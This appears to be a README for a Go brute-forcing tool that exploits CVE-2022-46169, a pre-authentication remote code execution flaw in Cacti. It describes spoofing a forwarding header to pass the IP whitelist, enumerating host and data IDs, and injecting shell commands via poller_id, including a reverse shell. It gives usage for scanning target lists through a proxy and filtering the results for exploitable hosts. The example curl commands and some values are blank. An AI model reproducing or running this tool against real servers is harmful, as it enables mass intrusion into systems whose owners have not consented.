# CVE-2022-46169

Cacti Blind Remote Code Execution (Pre-Auth)

## Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

## Explanation

This script bruteforces variables required to exploit this vulnerability. This exploit requires the following 3 variables:

- Whitelisted IP address
- Correct `host_id` parameter
- Correct `local_data_ids` parameter

The file `remote_agent.php` is protected by a IP whitelist. You can bypass this by spoofing your IP address in the `X-Forwarded-IP` header. Most instances will have `` or the server's own IP address whitelisted.

Next you need to bruteforce the `host_id` and `local_data_ids` request parameters. This is done by enumerating pairs of integers `x,y` from a default min value of 1 and max value of 10.

Example Request

curl -k -H "X-Forwarded-For:" \


## Exploitation

After you've gotten these 3 variables, you can inject a shell command into the `poller_id` key and escape it by putting a `;` before your command.

This is a blind RCE, so you need to send the output of your command somewhere like or open a reverse shell. Remember to URL encode your the `poller_id` value!

The following executes the command `ping $(whoami)`

curl -k -H "X-Forwarded-For:" \

## Output

The script oututs in a CSV format. The headers are `"target", "ip", "host_id", "data_id", "url"`.

If the `url` value is missing, it means the script was able to bypass the IP restriction but not successfully bruteforce the IDs. You can take this output and set a higher max value to attempt again.

## Parsing Output

You can use the following commands to quickly parse the output file

### Targets with IP restriction bypassed

tail -n +2 results.csv | cut -d ',' -f1 | sort -u

### Exploitable Targets

tail -n +2 results.csv | cut -d ',' -f5 | sort -u 

## Build

go build -v -o bruteforce bruteforce.go

## Usage

./bruteforce -l targets.txt -t 50 -min 1 -max 10

- **Targets must be a list of IP addresses, port may be omitted**
- Socks5 proxy is supported `-proxy socks5://`
- Default output file is `results.csv`